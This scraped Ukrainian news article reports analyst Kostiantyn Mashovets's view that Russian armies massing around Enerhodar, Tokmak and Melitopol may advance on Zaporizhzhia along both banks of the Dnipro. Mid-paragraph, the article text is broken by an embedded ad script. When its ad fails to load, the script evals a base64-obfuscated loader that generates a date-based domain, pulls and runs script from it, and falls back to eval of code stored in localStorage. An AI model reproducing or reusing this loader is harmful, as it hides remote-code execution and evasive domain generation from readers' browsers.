Наступ на Запоріжжя можливий з двох сторін: експерт про посилення ударного угрупування рф на Півдні

Російські окупаційні війська високими темпами створюють ударні угрупування на захоплених територіях Запорізькій та Херсонській областях. Цілком ймовірно для наступу в тому числі на Запоріжжя, яке може відбуватися по обох берегах Дніпра.

Таку думку у Телеграм висловив військовий експерт, координатор групи «Інформаційний спротив» Костянтин Машовець, аналізуючи місця дислокації нових підрозділів ворога та їх склад. Про це інформує Акцент.

Як пише Машовець на перший погляд наступ на Запоріжжя виглядає не дуже логічним, але склад угрупування наводить на інші думки.

«Особисто за моєю думкою, противник збирається наступати по обом берегам Дніпра на північ. Тобто на Нікополь — Запоріжжя (по правому) та майже одночасно на теж Запоріжжя з іншого боку (вздовж лівого). Але не зразу і навіть не завтра, а лише після «вирішення нагальних проблемних питань» в Південій операційній зоні. На мій, трохи чудернацький погляд, найближчим часом, на Півдні, противник у першу чергу буде вирішувати ряд оперативних завдань Причому, не всі вони будуть активного, наступального характеру… і зовсім не обов’язково головні події будуть розвиватися саме на тих операційних напрямках, які відповідають терміну «наступ на Миколаїв та Кривій Ріг», — пише експерт .

Машовець додає, що дії віськового командування також будут залежати від реальної обстановки, яка нині складається у Південій операційній зон, а також військово-політичного (стратегічного) фактору, який кардинальним чином впливає на сенс та зміст рішень, російського військового командування, особливо на оперативному рівні.

Виявляється, що окрім сил противника, які направлені на зміцнення угрупування військ рф на Херсоньскому напрямку (5-та загальновійськова армія), глибоко в тил заведені або йдуть ще кілька потужних угрупувань — 35-ої ЗВА, 29-та та 36 ЗВА.

Підрозділи 35-ї армії вже зосереджені та розгорнуті у районі Велика Лепетиха — Демидівка — Новодніпровка — Енергодар а сили та засоби 5-ї ЗВА ще продовжують розгортання у районі Нова Маячка — Абрикосівка — Стара Маячка — Чорнянка . var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

місця розгортання 35-ї армії

«На поверхневий погляд, для майбутнього оперативного наступу це виглядає, трохи дивним… І дійсно, обидві армії розгортаються ДО Дніпра (тобто на його лівому березі), але якщо 5-а ЗВА, явно націлена на підсилення військ 49-ї ЗВА та 22-го АК Південного округу, які зараз ведуть напружені оборонні бої на підступах до самого Херсону, то 35-а ЗВА, якогось дідька, залізла у «глухий кут» південіше Енергодару напроти Нікополя і маючи перед собою Дніпро у одному з найширших його місць, й судячі зі всього, вилазити звідти ця «армія» найближчим часом явно не збирається… Постає, у цьому зв’язку, цілком закономірне питання… якого хера…?

Але насправді, усе стає на свої місця, якщо допустити, що 35-а ЗВА (до 8-9 БТГр\ТГр) залізла туди не для того, щоб потім опинитися на Херсонсько — Бериславському плацдармі, а навпаки — для того щоб діяти…. у бік Запоріжжя», — пояснює експерт.

Також Машовець додає ще кілька аргументів на цей бік, згадуючи про події що відбуваються останнім часом на ділянці фронту від Василівки до Володимирівки (під Волновахою). В тилових зонах навколо Токмака та Мелітополя там також створюються ударні угрупування військ противника.

«Нагадаю, це угрупування військ противника (під загальним керівництвом 58-ї ЗВА Південого воєного округу зс рф), десь у 14-15 БТГр, разом із 83-ї одшбр, 22-ї обр СпП та 1-2-х БТГр чвк «вагнера» на сьогоднішній день вирішує два основних завдання — веде жорсткі обороні бої із передовими підрозділами ЗСУ, які повільно, але достатньо впевнено просуваються в районі м. Пологи, на ділянці Малі Щербаки — Нестерянка та південіше Вугледару і одночасно з цим… розгортає у себе в тилах (а саме в районі Токмак, Мелітополь, Новоалексіївка та ряду інших ключових пунктів) потужне угрупування військ зовсім іншої «етімології». Наприклад, лише протягом останніх 3-х днів у тилах російської 58-ї ЗВА Південого воєного округу якось так «раптово» повспливали зразу 3 БТГр — 1БТГр зі складу 31-ї одшбр (район південніше Євгенівки), ще дві БТГр зі складу 37-ї мсбр 36-ї ЗВА того самого Східного воєного округу зс рф, які до цього «десь загубились по дорозі» (район м. Токмак). А якщо пригадати, що протягом попереднього тиждня у районі Мелітополя «висадились» також 2-і БТГр зі складу 810-й обрмп чф-у, а у райони Новоалексіївки та Радивонівки загалом «доїхали» ще 5 БТГр зі складу 36-ї ЗВА усе того ж Східного воєного округу, то будь-які сумніви щодо подальших намірів противника, стосовно майбутнього «наступу» пропадають… І це все, ОКРІМ сил та засобів власне 58-ї ЗВА, — зазначає експерт.

Вже після цього стало відомо, що до Запорізької області також було направлено майже 1000 кадирівців із Росгаврдії. Підрозділи Росгвардії зазвичай потрібні для утримання вже захоплених територій. В штурмах та безпосередніх бойових діяз вони участі не беруть. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/nastup-na-zaporizhzhya-mozhlivij-z-dvoh-storin-ekspert-pro-posilennya-udarnogo-ugrupuvannya-rf-na-pivdni/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top